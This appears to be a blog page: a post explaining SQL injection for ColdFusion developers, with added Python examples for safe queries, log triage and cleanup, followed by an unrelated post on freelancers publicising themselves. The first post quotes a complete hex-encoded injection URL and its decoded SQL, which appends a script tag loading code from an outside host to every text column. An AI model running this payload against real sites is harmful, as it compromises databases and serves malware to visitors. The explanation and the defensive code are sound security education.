What is a SQL Injection Attack

Over the past few weeks, subversive elements in the international arena have decided that attacking websites is a fun thing to do! The online world has become the new battleground between nations vying to destabilise rivals. This may seem all very Jack Bauer, but we are increasingly seeing ‘SQL injection attacks’ emanating from countries such as Russia, China and North Korea. Of course, that doesn’t mean our countries aren’t doing the same in return, but we only see the results from foreign-based attacks.

What is a SQL Injection Attack?

SQL Injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
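As an added illustration (mine, not code from the original post), here are the two defects this paragraph names, an untyped value pasted into the statement text and a quote that closes a string literal early, side by side with the bound-parameter fix. The in-memory SQLite table, its rows and the INJECTED_ID value (which keeps only the shape of the hacked URL quoted later in the post, with a stand-in hex blob) are constructed for this example; the cfqueryparam reference in the comment is the ColdFusion equivalent of binding a typed parameter.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the data source behind fileName.cfm (not the post's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(4241, "Widget"), (4242, "O'Reilly Guide")])
    return conn

# Constructed stand-in for the hacked variable2 value: same shape as the post's (a second
# statement after ';', a hex blob CAST to CHAR, then EXEC), but the blob is just 'DECLARE'.
INJECTED_ID = "4241;DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245 AS CHAR(4000));EXEC(@S);"

def unsafe_sql_by_id(variable2):
    """Defect 1, input not strongly typed: the raw request value is pasted into the statement
    text, so the ';' inside it starts a second statement that a server accepting batches runs too."""
    return "SELECT id, title FROM items WHERE id = " + variable2

def unsafe_sql_by_title(title):
    """Defect 2, escape characters not handled: a quote in the value closes the string literal
    early and whatever follows is parsed as SQL rather than treated as data."""
    return "SELECT id, title FROM items WHERE title = '" + title + "'"

def run_unsafe(conn, sql):
    """Execute concatenated SQL text; returns the rows, or 'error: ...' if the parser rejects it."""
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error: " + str(exc)

def safe_by_id(conn, variable2):
    """Fix for defect 1: validate the type, then bind the value. The driver sends the number
    separately from the SQL text, so it can never be read as a statement.
    ColdFusion equivalent: <cfqueryparam value="#url.variable2#" cfsqltype="cf_sql_integer">."""
    item_id = int(variable2)  # ValueError for anything that is not a whole number
    return conn.execute("SELECT id, title FROM items WHERE id = ?", (item_id,)).fetchall()

def safe_by_title(conn, title):
    """Fix for defect 2: a bound parameter, so quotes inside the value stay data."""
    return conn.execute("SELECT id, title FROM items WHERE title = ?", (title,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(unsafe_sql_by_id(INJECTED_ID))                          # two statements in one string
    print(run_unsafe(db, unsafe_sql_by_title("O'Reilly Guide")))  # error: the quote broke the literal
    print(safe_by_title(db, "O'Reilly Guide"))                    # [(4242, "O'Reilly Guide")]
    print(safe_by_id(db, "4241"))                                 # [(4241, 'Widget')]
```

The legitimate title containing an apostrophe is the everyday reason the string-literal problem bites: the concatenated query fails for an ordinary user long before anyone hostile arrives, while the bound version handles it without any escaping code.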

Real World Example

SQL Injection attacks are commonly associated with a technique called Cross-Site Scripting (XSS). XSS is a type of computer security vulnerability typically found in web applications which allows malicious web users to inject code into the web pages viewed by other users. In the example below the two are combined: the SQL injection is the way in, and what it writes into the database is an XSS payload served to every visitor.

In reality, what does this look like?

The following is a legitimate URL that may be navigated to by the user agent:

http://www.domain.com/folderName/fileName.cfm?variable1=0&variable2=4241

The following is a hacked URL:

http://www.domain.com/folderName/filename.cfm?variable1=0&variable2=4241;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272077686572652027  2B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

The code appended to the URL is a hexadecimal string. CAST(0x... AS CHAR(4000)) turns it back into text inside the database and EXEC(@S) runs that text, so the bulk of the attack never appears as readable SQL in the request. When the hexadecimal string is decoded by the SQL server, the SQL code generated looks similar to the following:

DECLARE @T varchar(255),@C varchar(4000) 
DECLARE Table_Cursor CURSOR 
FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b 
WHERE a.id=b.id 
AND a.xtype='u' 
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM  Table_Cursor 
INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title>
<script src="http://1.verynx.cn/w.js"></script><!--'' 
where '+@C+' not like ''%"></title>
<script src="http://1.verynx.cn/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor
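Decoding such a payload is something a defender does from the web server log, so here is an added example (mine, not the post's code) of the step described above: URL-decode the query string, pull the hex out of CAST(0x... AS CHAR(4000)), and turn it back into the SQL text, then run the same check across log lines. The HACKED_QUERY string is the query string of the hacked URL quoted in the post, split across string literals only for readability; the two lines in SAMPLE_LOG are constructed.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Query string of the hacked URL quoted in the post (the hex is the page's own payload).
HACKED_QUERY = (
    "variable1=0&variable2=4241;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    "4445434C41524520405420766172636861722"
    "8323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F522"
    "0464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C7"
    "56D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E787479706"
    "53D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204"
    "F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E5"
    "44F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746"
    "5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697"
    "074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776"
    "865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D226874747"
    "03A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204"
    "6524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736"
    "F72204445414C4C4F43415445205461626C655F437572736F72"
    "%20AS%20CHAR(4000));EXEC(@S);"
)

# A hex literal cast to a character type: the obfuscation the post describes.
_CAST_HEX = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\)", re.IGNORECASE)
_EXEC = re.compile(r"\bEXEC(?:UTE)?\s*\(", re.IGNORECASE)

def decode_hex_payload(query_string: str) -> Optional[str]:
    """Return the SQL hidden in a CAST(0x...) blob of a URL query string, or None if there is none."""
    text = unquote(query_string)            # %20 -> space, etc.
    m = _CAST_HEX.search(text)
    if not m:
        return None
    hex_blob = m.group(1)
    if len(hex_blob) % 2:                   # a clipped log line may lose the last nibble
        hex_blob = hex_blob[:-1]
    # CHAR(4000) is a single-byte type, so latin-1 maps every byte to exactly one character.
    return bytes.fromhex(hex_blob).decode("latin-1")

def script_sources(sql: str) -> List[str]:
    """The src= targets of any <script> tags the decoded SQL would write into the data."""
    return re.findall(r'<script\s+src="([^"]+)"', sql, flags=re.IGNORECASE)

def triage_log(lines) -> List[Tuple[int, str]]:
    """Scan web-server log lines; return (line_no, decoded_sql) for each one that carries a
    hex-cast payload together with an EXEC call."""
    hits = []
    for n, line in enumerate(lines, 1):
        sql = decode_hex_payload(line)
        if sql is not None and _EXEC.search(unquote(line)):
            hits.append((n, sql))
    return hits

# Constructed sample log lines (not from the post): one normal request, one carrying the payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jul/2008:10:00:01 +0100] "GET /folderName/fileName.cfm?variable1=0&variable2=4241 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jul/2008:10:00:07 +0100] "GET /folderName/filename.cfm?' + HACKED_QUERY + ' HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for line_no, sql in triage_log(SAMPLE_LOG):
        print(f"line {line_no}: injects scripts from {script_sources(sql)}")
        print(sql)
```

Searching for CAST(0x...) followed by EXEC catches this family of payloads regardless of what the hex spells out, which is why it makes a better log filter than matching the decoded script URL.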

Somewhat unhelpfully, if the user credentials used to access the database have access to the system tables (sysobjects and syscolumns above), the SQL injection attack is able to interrogate those tables and determine the structure of your database. The result of the above example is that the following code is appended to every string-based column in every user table:

</title><script src="http://1.verynx.cn/w.js"></script><!--

To put it simply, this is very bad news!
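Because the string lands in every string-typed column of every table, cleanup has to walk the catalogue the same way the payload did. The following is an added example (not from the post) of that walk for SQLite: enumerate the user tables and their character-typed columns, count the rows carrying the fragment, and strip it with replace(). The tables and rows in make_infected_db are constructed sample data; the MARKER string is the fragment quoted above. sqlite_master and PRAGMA table_info stand in for the sysobjects and syscolumns tables the payload reads on SQL Server.

```python
import sqlite3

# The fragment the post says ends up appended to every string column (the page's own string).
MARKER = '</title><script src="http://1.verynx.cn/w.js"></script><!--'

def make_infected_db():
    """Constructed sample database (not from the post): two tables, some rows already carrying
    the appended fragment, clean rows, and a non-text column that must be left alone."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, blurb TEXT, price REAL)")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, headline VARCHAR(255))")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", [
        (1, "Widget" + MARKER, "Small and round" + MARKER, 9.99),
        (2, "Gadget" + MARKER, "Untouched blurb", 19.99),
    ])
    conn.executemany("INSERT INTO news VALUES (?, ?)", [
        (1, "Site launched" + MARKER),
        (2, "Clean headline"),
    ])
    return conn

def text_columns(conn):
    """Walk the catalogue: every user table, every column whose declared type is a character type."""
    cols = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _, name, decl_type, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(t in (decl_type or "").upper() for t in ("CHAR", "TEXT", "CLOB")):
                cols.append((table, name))
    return cols

def find_infected(conn, marker=MARKER):
    """Return [(table, column, rows_affected)] for every text column that contains the marker.
    Table and column names come from the catalogue, never from a request, and are double-quoted."""
    hits = []
    for table, col in text_columns(conn):
        (n,) = conn.execute(
            f'SELECT COUNT(*) FROM "{table}" WHERE instr("{col}", ?) > 0', (marker,)).fetchone()
        if n:
            hits.append((table, col, n))
    return hits

def clean_infected(conn, marker=MARKER):
    """Strip the appended fragment from every affected column; returns the total rows changed.
    Take a backup first and confirm with find_infected() afterwards."""
    changed = 0
    for table, col, _ in find_infected(conn, marker):
        cur = conn.execute(
            f'UPDATE "{table}" SET "{col}" = replace("{col}", ?, ?) WHERE instr("{col}", ?) > 0',
            (marker, "", marker))
        changed += cur.rowcount
    conn.commit()
    return changed

if __name__ == "__main__":
    db = make_infected_db()
    print(find_infected(db))                 # which columns carry the fragment, and how many rows
    print(clean_infected(db), "rows cleaned")
    print(find_infected(db))                 # [] once the fragment is gone
```

This runs under an administrative login, which is the point the post is making in reverse: the application's own database account should not be able to read the system tables at all, so that an injection through the website cannot discover the schema the way this cleanup script does.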

ColdFusion-hacking is Popularised

ColdFusion-based sites are by no means immune to this international ‘information war’. The popularity of attacks on ColdFusion-based websites can be summarised by the fact that an article was featured on The Hacker Webzine recently, detailing how to implement a successful attack.

How to ‘Fix’ the Problem

As ColdFusion developers we not only need to be aware of the problem, we need to also know how to fix the problem and mitigate against an attack before it even happens.

In my next post, I will discuss how to fix a SQL injection attack.

In the first part of this series I talked about setting yourself up in business. The next step is to publicise yourself and your skills. At this point, it is helpful to know exactly what line of work you want to be focusing on, since you will need to target your efforts.

In the dim and distant past, the job of publicising yourself was extremely difficult. Can you imagine life without the Internet, mobile telephones and email? How did people ever do business? With the advent of the World Wide Web and in particular search engines and blogging, this all changed and a wealth of opportunity has become available, especially to the freelancer.

But where do you start?

Create a Brand

Creating a brand is a great way to market yourself. This does not have to be the same as your company, and through time you may set up different brands for different sectors or ideas you may have. Brands serve to create associations and therefore, expectations of products you create, so a good brand name is a great way to get recognised in your community.

You can register the brand in the UK, Europe and the US, although the latter requires a US address. It is also not a given that your brand registration will be successful, making it a costly exercise. Careful consideration is what is needed here.

Create an Avatar

Avatars are images or icons that represent you in the online world. They are an extension of your brand. For example, the header of my website is also my favicon and avatar on various online services. It is a great way for people to draw an association between your online presence and you.

Create a Blog

Blogs are a great way to get yourself known and therefore heard amongst your peer group. Your blog should really be an extension of your brand and is a great avenue to showcase your skills, demo example applications, code and designs, or simply give your opinion on a subject.

I use the excellent WordPress blogging application, in a self-hosted environment. You don’t need to do this since there is a hosted version at WordPress.com, or you could use Blogger, another popular blogging platform, provided by Google.

The key to blogging is to talk about what you enjoy; don’t just keep it technical. Blogs should be an extension of you, not an avenue for pretentious comment; you’ll soon be found out!

If you go the self-hosted route, you’ll need a domain name, hosting provider and obviously a blog application. I have listed a few below that can get you started.

Domain Names:

Hosting Providers:

Blog Applications:

If going the self-hosted route is all too complicated for you, or you simply don’t want the hassle that is associated with self-hosting, all is not lost. WordPress.com and Blogger are for you.

Blog Hosting Providers:

Both services take the onus away from the user when it comes to management (backups, plugins etc). At the simplest level, all you need to do is create and publish the content.

Join feed aggregators

To get noticed in the blogosphere, you can’t simply rely on the Google, Yahoo! and Microsoft search engines ranking your site. You will need to alert your peers to the fact that you’ve created some content that is worth reading. You can achieve this with feed aggregators.

Below I list a few that I use:

If you use WordPress, then you’re in luck. WordPress has a service called Ping-o-matic, which updates different search engines when your blog has been updated. You can also add your own services to ping and therefore notify the service of new content.

Comment on Blogs

Commenting on blogs is another great way of getting yourself known as well as offering an opinion. Since comments allow you to include a link back to your website, try and comment as your brand.

One tip: try not to be defamatory towards the blog owner or others unless you have a strong justification for doing so. It’s all about the karma!

Join Micro-Blogging Services

If blogging is not your thing or you don’t have time to write articles, there are a number of blogging and, more importantly, micro-blogging services available to you that allow you to get your thoughts out into the wide world.

Such services include the not-always-venerable Twitter, the feature rich Pownce, the new kid on the block Plurk and the blogging service, Tumblr.

Building a following will allow you to announce to your followers important events and ask questions of them.

What’s Next

In the next part of this series, I’ll talk about networking, a natural extension to publicising yourself on the web.